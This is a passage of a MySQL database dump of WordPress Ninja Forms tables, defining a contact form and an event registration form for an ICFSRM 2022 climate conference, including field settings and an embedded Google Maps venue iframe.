(342,9,'label_pos','default','label_pos','default'),
(343,9,'required','1','required','1'),
(344,9,'default','','default',''),
(345,9,'placeholder','','placeholder',''),
(346,9,'container_class','one-half first','container_class','one-half first'),
(347,9,'element_class','','element_class',''),
(348,9,'admin_label','','admin_label',''),
(349,9,'help_text','','help_text',''),
(350,9,'desc_text','','desc_text',''),
(351,9,'field_label','Email','field_label','Email'),
(352,9,'field_key','email','field_key','email'),
(353,9,'custom_name_attribute','email','custom_name_attribute','email'),
(354,9,'personally_identifiable','1','personally_identifiable','1'),
(355,9,'value','','value',''),
(356,9,'parent_id','2','parent_id','2'),
(357,10,'objectType','Field','objectType','Field'),
(358,10,'objectDomain','fields','objectDomain','fields'),
(359,10,'editActive','','editActive',''),
(360,10,'order','6','order','6'),
(361,10,'label','Phone','label','Phone'),
(362,10,'key','textbox','key','textbox'),
(363,10,'type','textbox','type','textbox'),
(364,10,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(365,10,'label_pos','default','label_pos','default'),
(366,10,'required','1','required','1'),
(367,10,'placeholder','','placeholder',''),
(368,10,'default','','default',''),
(369,10,'container_class','one-half','container_class','one-half'),
(370,10,'element_class','','element_class',''),
(371,10,'input_limit','','input_limit',''),
(372,10,'input_limit_type','characters','input_limit_type','characters'),
(373,10,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),
(374,10,'manual_key','','manual_key',''),
(375,10,'disable_input','','disable_input',''),
(376,10,'admin_label','','admin_label',''),
(377,10,'help_text','','help_text',''),
(378,10,'desc_text','','desc_text',''),
(379,10,'disable_browser_autocomplete','','disable_browser_autocomplete',''),
(380,10,'mask','','mask',''),
(381,10,'custom_mask','','custom_mask',''),
(382,10,'field_label','Phone','field_label','Phone'),
(383,10,'field_key','textbox','field_key','textbox'),
(384,10,'custom_name_attribute','','custom_name_attribute',''),
(385,10,'personally_identifiable','','personally_identifiable',''),
(386,10,'value','','value',''),
(387,10,'parent_id','2','parent_id','2'),
(388,11,'objectType','Field','objectType','Field'),
(389,11,'objectDomain','fields','objectDomain','fields'),
(390,11,'editActive','','editActive',''),
(391,11,'order','7','order','7'),
(392,11,'label','Divider','label','Divider'),
(393,11,'key','hr_1','key','hr_1'),
(394,11,'type','hr','type','hr'),
(395,11,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(396,11,'container_class','','container_class',''),
(397,11,'element_class','','element_class',''),
(398,11,'field_label','Divider','field_label','Divider'),
(399,11,'field_key','hr_1','field_key','hr_1'),
(400,11,'parent_id','2','parent_id','2'),
(458,15,'objectType','Field','objectType','Field'),
(459,15,'objectDomain','fields','objectDomain','fields'),
(460,15,'editActive','','editActive',''),
(461,15,'order','11','order','11'),
(462,15,'label','Divider','label','Divider'),
(463,15,'key','hr_2','key','hr_2'),
(464,15,'type','hr','type','hr'),
(465,15,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(466,15,'container_class','','container_class',''),
(467,15,'element_class','','element_class',''),
(468,15,'field_label','Divider','field_label','Divider'),
(469,15,'field_key','hr_2','field_key','hr_2'),
(470,15,'parent_id','2','parent_id','2'),
(471,16,'objectType','Field','objectType','Field'),
(472,16,'objectDomain','fields','objectDomain','fields'),
(473,16,'editActive','','editActive',''),
(474,16,'order','12','order','12'),
(475,16,'label','HTML','label','HTML'),
(476,16,'key','html','key','html'),
(477,16,'type','html','type','html'),
(478,16,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(479,16,'default','<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>','default','<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>'),
(480,16,'container_class','','container_class',''),
(481,16,'element_class','','element_class',''),
(482,16,'field_label','HTML','field_label','HTML'),
(483,16,'field_key','html','field_key','html'),
(484,16,'drawerDisabled','','drawerDisabled',''),
(485,16,'parent_id','2','parent_id','2'),
(486,17,'objectType','Field','objectType','Field'),
(487,17,'objectDomain','fields','objectDomain','fields'),
(488,17,'editActive','','editActive',''),
(489,17,'order','13','order','13'),
(490,17,'label','Register','label','Register'),
(491,17,'key','register','key','register'),
(492,17,'type','submit','type','submit'),
(493,17,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(494,17,'processing_label','Processing','processing_label','Processing'),
(495,17,'container_class','','container_class',''),
(496,17,'element_class','','element_class',''),
(497,17,'field_label','Register','field_label','Register'),
(498,17,'field_key','register','field_key','register'),
(499,17,'parent_id','2','parent_id','2'),
(500,5,'idAttribute','id','idAttribute','id'),
(501,5,'drawerDisabled','','drawerDisabled',''),
(502,6,'idAttribute','id','idAttribute','id'),
(503,7,'idAttribute','id','idAttribute','id'),
(504,8,'idAttribute','id','idAttribute','id'),
(505,9,'idAttribute','id','idAttribute','id'),
(506,10,'idAttribute','id','idAttribute','id'),
(507,10,'drawerDisabled','','drawerDisabled',''),
(508,11,'idAttribute','id','idAttribute','id'),
(509,15,'idAttribute','id','idAttribute','id'),
(510,16,'idAttribute','id','idAttribute','id'),
(511,17,'idAttribute','id','idAttribute','id');
/*!40000 ALTER TABLE `dnctiavkr_nf3_field_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_fields`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_fields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` longtext DEFAULT NULL,
  `key` longtext DEFAULT NULL,
  `type` longtext DEFAULT NULL,
  `parent_id` int(11) NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  `field_label` longtext DEFAULT NULL,
  `field_key` longtext DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `required` bit(1) DEFAULT NULL,
  `default_value` longtext DEFAULT NULL,
  `label_pos` varchar(15) DEFAULT NULL,
  `personally_identifiable` bit(1) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_fields`
--

LOCK TABLES `dnctiavkr_nf3_fields` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_fields` DISABLE KEYS */;
INSERT INTO `dnctiavkr_nf3_fields` VALUES
(1,'Name','name','textbox',1,'2022-11-12 19:03:54','2022-11-12 14:03:54',NULL,NULL,NULL,NULL,NULL,NULL,NULL),
(2,'Email','email','email',1,'2022-11-12 19:03:54','2022-11-12 14:03:54',NULL,NULL,NULL,NULL,NULL,NULL,NULL),
(3,'Message','message','textarea',1,'2022-11-12 19:03:54','2022-11-12 14:03:54',NULL,NULL,NULL,NULL,NULL,NULL,NULL),
(4,'Submit','submit','submit',1,'2022-11-12 19:03:54','2022-11-12 14:03:54',NULL,NULL,NULL,NULL,NULL,NULL,NULL),
(5,'ICFSRM 2022 Conference is \" Climate change, challenges and threats \"','icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133','html',2,'2022-11-12 14:14:19',NULL,'ICFSRM 2022 Conference is \" Climate change, challenges and threats \"','icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133',1,'\0','<p><br></p>','','\0'),
(6,'Divider','hr','hr',2,'2022-11-12 14:14:19',NULL,'Divider','hr',2,'\0','','','\0'),
(7,'First Name','firstname','firstname',2,'2022-11-12 14:08:38',NULL,'First Name','firstname',3,'','','default',''),
(8,'Last Name','lastname','lastname',2,'2022-11-12 14:08:38',NULL,'Last Name','lastname',4,'','','default',''),
(9,'Email','email','email',2,'2022-11-12 14:08:38',NULL,'Email','email',5,'','','default',''),
(10,'Phone','textbox','textbox',2,'2022-11-12 14:08:38',NULL,'Phone','textbox',6,'','','default','\0'),
(11,'Divider','hr_1','hr',2,'2022-11-12 14:14:19',NULL,'Divider','hr_1',7,'\0','','','\0'),
(15,'Divider','hr_2','hr',2,'2022-11-12 14:14:19',NULL,'Divider','hr_2',11,'\0','','','\0'),
(16,'HTML','html','html',2,'2022-11-12 14:14:19',NULL,'HTML','html',12,'\0','<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>','','\0'),
(17,'Register','register','submit',2,'2022-11-12 14:14:19',NULL,'Register','register',13,'\0','','','\0');
/*!40000 ALTER TABLE `dnctiavkr_nf3_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_form_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_form_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_form_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=123 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_form_meta`
--

LOCK TABLES `dnctiavkr_nf3_form_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_form_meta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_nf3_form_meta` VALUES
(1,1,'key','','key',''),
(2,1,'created_at','2022-11-12 14:03:54','created_at','2022-11-12 14:03:54'),
(3,1,'default_label_pos','above','default_label_pos','above'),
(4,1,'conditions','a:0:{}','conditions','a:0:{}'),
(5,1,'objectType','Form Setting','objectType','Form Setting'),
(6,1,'editActive','','editActive',''),
(7,1,'show_title','1','show_title','1'),
(8,1,'clear_complete','1','clear_complete','1'),
(9,1,'hide_complete','1','hide_complete','1'),
(10,1,'wrapper_class','','wrapper_class',''),
(11,1,'element_class','','element_class',''),
(12,1,'add_submit','1','add_submit','1'),
(13,1,'logged_in','','logged_in',''),
(14,1,'not_logged_in_msg','','not_logged_in_msg',''),
(15,1,'sub_limit_number','','sub_limit_number',''),
(16,1,'sub_limit_msg','','sub_limit_msg',''),
(17,1,'calculations','a:0:{}','calculations','a:0:{}'),
(18,1,'formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}','formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}'),
(19,1,'container_styles_background-color','','container_styles_background-color',''),
(20,1,'container_styles_border','','container_styles_border',''),
(21,1,'container_styles_border-style','','container_styles_border-style',''),
(22,1,'container_styles_border-color','','container_styles_border-color',''),
(23,1,'container_styles_color','','container_styles_color',''),
(24,1,'container_styles_height','','container_styles_height',''),
(25,1,'container_styles_width','','container_styles_width',''),
(26,1,'container_styles_font-size','','container_styles_font-size',''),
(27,1,'container_styles_margin','','container_styles_margin',''),
(28,1,'container_styles_padding','','container_styles_padding',''),
(29,1,'container_styles_display','','container_styles_display',''),
(30,1,'container_styles_float','','container_styles_float',''),
(31,1,'container_styles_show_advanced_css','0','container_styles_show_advanced_css','0'),
(32,1,'container_styles_advanced','','container_styles_advanced',''),
(33,1,'title_styles_background-color','','title_styles_background-color',''),
(34,1,'title_styles_border','','title_styles_border',''),
(35,1,'title_styles_border-style','','title_styles_border-style',''),
(36,1,'title_styles_border-color','','title_styles_border-color',''),
(37,1,'title_styles_color','','title_styles_color',''),
(38,1,'title_styles_height','','title_styles_height',''),
(39,1,'title_styles_width','','title_styles_width',''),
(40,1,'title_styles_font-size','','title_styles_font-size',''),
(41,1,'title_styles_margin','','title_styles_margin',''),
(42,1,'title_styles_padding','','title_styles_padding',''),
(43,1,'title_styles_display','','title_styles_display',''),
(44,1,'title_styles_float','','title_styles_float',''),
(45,1,'title_styles_show_advanced_css','0','title_styles_show_advanced_css','0'),
(46,1,'title_styles_advanced','','title_styles_advanced',''),
(47,1,'row_styles_background-color','','row_styles_background-color',''),
(48,1,'row_styles_border','','row_styles_border',''),
(49,1,'row_styles_border-style','','row_styles_border-style',''),
(50,1,'row_styles_border-color','','row_styles_border-color',''),
(51,1,'row_styles_color','','row_styles_color',''),
(52,1,'row_styles_height','','row_styles_height',''),
(53,1,'row_styles_width','','row_styles_width',''),
(54,1,'row_styles_font-size','','row_styles_font-size',''),
(55,1,'row_styles_margin','','row_styles_margin',''),
(56,1,'row_styles_padding','','row_styles_padding',''),
(57,1,'row_styles_display','','row_styles_display',''),
(58,1,'row_styles_show_advanced_css','0','row_styles_show_advanced_css','0'),
(59,1,'row_styles_advanced','','row_styles_advanced',''),
(60,1,'row-odd_styles_background-color','','row-odd_styles_background-color',''),
(61,1,'row-odd_styles_border','','row-odd_styles_border',''),
(62,1,'row-odd_styles_border-style','','row-odd_styles_border-style',''),
(63,1,'row-odd_styles_border-color','','row-odd_styles_border-color',''),
(64,1,'row-odd_styles_color','','row-odd_styles_color',''),
(65,1,'row-odd_styles_height','','row-odd_styles_height',''),
(66,1,'row-odd_styles_width','','row-odd_styles_width',''),
(67,1,'row-odd_styles_font-size','','row-odd_styles_font-size',''),
(68,1,'row-odd_styles_margin','','row-odd_styles_margin',''),
(69,1,'row-odd_styles_padding','','row-odd_styles_padding',''),
(70,1,'row-odd_styles_display','','row-odd_styles_display',''),
(71,1,'row-odd_styles_show_advanced_css','0','row-odd_styles_show_advanced_css','0'),
(72,1,'row-odd_styles_advanced','','row-odd_styles_advanced',''),
(73,1,'success-msg_styles_background-color','','success-msg_styles_background-color',''),
(74,1,'success-msg_styles_border','','success-msg_styles_border',''),
(75,1,'success-msg_styles_border-style','','success-msg_styles_border-style',''),
(76,1,'success-msg_styles_border-color','','success-msg_styles_border-color',''),
(77,1,'success-msg_styles_color','','success-msg_styles_color',''),
(78,1,'success-msg_styles_height','','success-msg_styles_height',''),
(79,1,'success-msg_styles_width','','success-msg_styles_width',''),
(80,1,'success-msg_styles_font-size','','success-msg_styles_font-size',''),
(81,1,'success-msg_styles_margin','','success-msg_styles_margin',''),
(82,1,'success-msg_styles_padding','','success-msg_styles_padding',''),
(83,1,'success-msg_styles_display','','success-msg_styles_display',''),
(84,1,'success-msg_styles_show_advanced_css','0','success-msg_styles_show_advanced_css','0'),
(85,1,'success-msg_styles_advanced','','success-msg_styles_advanced',''),
(86,1,'error_msg_styles_background-color','','error_msg_styles_background-color',''),
(87,1,'error_msg_styles_border','','error_msg_styles_border',''),
(88,1,'error_msg_styles_border-style','','error_msg_styles_border-style',''),
(89,1,'error_msg_styles_border-color','','error_msg_styles_border-color',''),
(90,1,'error_msg_styles_color','','error_msg_styles_color',''),
(91,1,'error_msg_styles_height','','error_msg_styles_height',''),
(92,1,'error_msg_styles_width','','error_msg_styles_width',''),
(93,1,'error_msg_styles_font-size','','error_msg_styles_font-size',''),
(94,1,'error_msg_styles_margin','','error_msg_styles_margin',''),
(95,1,'error_msg_styles_padding','','error_msg_styles_padding',''),
(96,1,'error_msg_styles_display','','error_msg_styles_display',''),
(97,1,'error_msg_styles_show_advanced_css','0','error_msg_styles_show_advanced_css','0'),
(98,1,'error_msg_styles_advanced','','error_msg_styles_advanced',''),
(99,2,'objectType','Form Setting','objectType','Form Setting'),
(100,2,'editActive','','editActive',''),
(101,2,'title','Event Registration','title','Event Registration'),
(102,2,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(103,2,'form_title','Event Registration','form_title','Event Registration'),
(104,2,'default_label_pos','above','default_label_pos','above'),
(105,2,'show_title','1','show_title','1'),
(106,2,'clear_complete','1','clear_complete','1'),
(107,2,'hide_complete','1','hide_complete','1'),
(108,2,'logged_in','0','logged_in','0'),
(109,2,'key','','key',''),
(110,2,'wrapper_class','','wrapper_class',''),
(111,2,'element_class','','element_class',''),
(112,2,'add_submit','0','add_submit','0'),
(113,2,'not_logged_in_msg','','not_logged_in_msg',''),
(114,2,'sub_limit_number','','sub_limit_number',''),
(115,2,'sub_limit_msg','','sub_limit_msg',''),
(116,2,'calculations','a:0:{}','calculations','a:0:{}'),
(117,2,'formContentData','a:10:{i:0;s:77:\"icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:4:\"hr_2\";i:8;s:4:\"html\";i:9;s:8:\"register\";}','formContentData','a:10:{i:0;s:77:\"icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:4:\"hr_2\";i:8;s:4:\"html\";i:9;s:8:\"register\";}'),
(118,2,'currency','','currency',''),
(119,2,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),
(120,2,'seq_num',NULL,'seq_num',NULL),
(121,2,'allow_public_link','0','allow_public_link','0'),
(122,2,'embed_form','','embed_form','');
/*!40000 ALTER TABLE `dnctiavkr_nf3_form_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_forms`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_forms` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` longtext DEFAULT NULL,
  `key` longtext DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  `views` int(11) DEFAULT NULL,
  `subs` int(11) DEFAULT NULL,
  `form_title` longtext DEFAULT NULL,
  `default_label_pos` varchar(15) DEFAULT NULL,
  `show_title` bit(1) DEFAULT NULL,
  `clear_complete` bit(1) DEFAULT NULL,
  `hide_complete` bit(1) DEFAULT NULL,
  `logged_in` bit(1) DEFAULT NULL,
  `seq_num` int(11) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_forms`
--

LOCK TABLES `dnctiavkr_nf3_forms` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_forms` DISABLE KEYS */;
INSERT INTO `dnctiavkr_nf3_forms` VALUES
(1,'Contact Me',NULL,'2022-11-12 14:03:54','2022-11-12 14:03:54',NULL,NULL,'Contact Me','above','','','','\0',NULL),
(2,'Event Registration',NULL,'2016-08-28 20:16:05',NULL,NULL,NULL,'Event Registration','above','','','','\0',NULL);
/*!40000 ALTER TABLE `dnctiavkr_nf3_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_object_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_object_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_object_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_object_meta`
--

LOCK TABLES `dnctiavkr_nf3_object_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_object_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_nf3_object_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_objects`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_objects`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_objects` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `type` longtext DEFAULT NULL,
  `title` longtext DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  `object_title` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_objects`
--

LOCK TABLES `dnctiavkr_nf3_objects` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_objects` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_nf3_objects` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_relationships`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_relationships` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `child_id` int(11) NOT NULL,
  `child_type` longtext NOT NULL,
  `parent_id` int(11) NOT NULL,
  `parent_type` longtext NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_relationships`
--

LOCK TABLES `dnctiavkr_nf3_relationships` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_relationships` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_nf3_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_upgrades`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_upgrades`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_upgrades` (
  `id` int(11) NOT NULL,
  `cache` longtext DEFAULT NULL,
  `stage` int(11) NOT NULL DEFAULT 0,
  `maintenance` bit(1) DEFAULT b'0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_upgrades`
--

LOCK TABLES `dnctiavkr_nf3_upgrades` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_upgrades` DISABLE KEYS */;
INSERT INTO `dnctiavkr_nf3_upgrades` VALUES
(1,'a:4:{s:2:\"id\";i:1;s:6:\"fields\";a:4:{i:0;a:2:{s:2:\"id\";i:1;s:8:\"settings\";a:70:{s:5:\"label\";s:4:\"Name\";s:3:\"key\";s:4:\"name\";s:9:\"parent_id\";i:1;s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\